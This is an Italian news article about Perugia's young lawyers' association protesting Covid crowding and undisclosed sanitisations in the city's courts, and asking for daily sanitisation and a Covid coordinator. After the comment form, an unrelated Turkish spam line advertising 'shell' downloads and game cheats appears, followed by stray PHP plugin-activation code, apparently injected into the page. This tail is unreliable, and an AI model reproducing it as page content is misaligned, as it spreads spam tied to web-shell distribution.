“In tribunale code e assembramenti” – Corriere dell’Umbria



Il presidente dell’associazione giovani avvocati di Perugia – Aiga – Alessandro Ciglioni – dopo quanto accaduto venerdì in tribunale, ha preso carta e penna e scritto ai presidenti di tribunale e ai procuratori del capoluogo. “Alcuni colleghi si sono trovati a dover svolgere il loro lavoro mentre avvenivano delle sanificazioni perché – nessuna informazione è pervenuta all’avvocatura – pare vi fossero dei casi di positività”. Secondo Aiga la situazione andava gestita almeno con comunicazioni ufficiali. I giovani legali inoltre lamentano situazioni “di assembramento nelle aule d’udienza e lunghe code fuori dagli uffici giudiziari, persone che continuano a non indossare i Dpi e lo svolgimento di maxi processi in luoghi non idonei (Capitini)”. Ciglioni chiede dunque che vengano adottate semplici misure per evitarne poi di peggiori. Tra queste la sanificazione quotidiana delle aule di udienza e, in caso di positività, sanificazioni ulteriori previa comunicazione agli addetti ai lavori e chiusura temporanea della sede interessata. Si chiede inoltre di individuare una figura che possa gestire tutte le questioni Covid negli uffici giudiziari. 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );